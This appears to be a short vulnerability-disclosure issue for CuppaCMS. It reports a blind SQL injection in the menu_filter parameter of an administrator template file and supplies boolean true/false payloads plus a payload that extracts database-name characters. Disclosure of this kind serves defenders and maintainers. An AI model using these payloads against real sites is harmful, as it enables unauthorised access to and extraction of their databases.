Open
Description
- VULNERABLE: SQL injection vulnerability exists in CuppaCMS. An attacker can inject query in
“/administrator/templates/default/html/windows/right.php" via the "menu_filter=2" parameters. - Contact me:wanghu29570@gmail.com
- Product:CuppaCMS
- Payload Boolean true: menu_filter=2' and '1'='1
- Payload Boolean false: menu_filter=2' and '1'='2
- Payload exploit example: menu_filter=2'+and(ascii(substr((select(database())),1,1))>50)#
- Proof of concept (POC):

- Payload Boolean true: menu_filter=2' and '1'='1

- Payload Boolean false: menu_filter=2' and '1'='2
- You can see that the two return packets are different

- Exploit:

Metadata
Assignees
Labels
No labels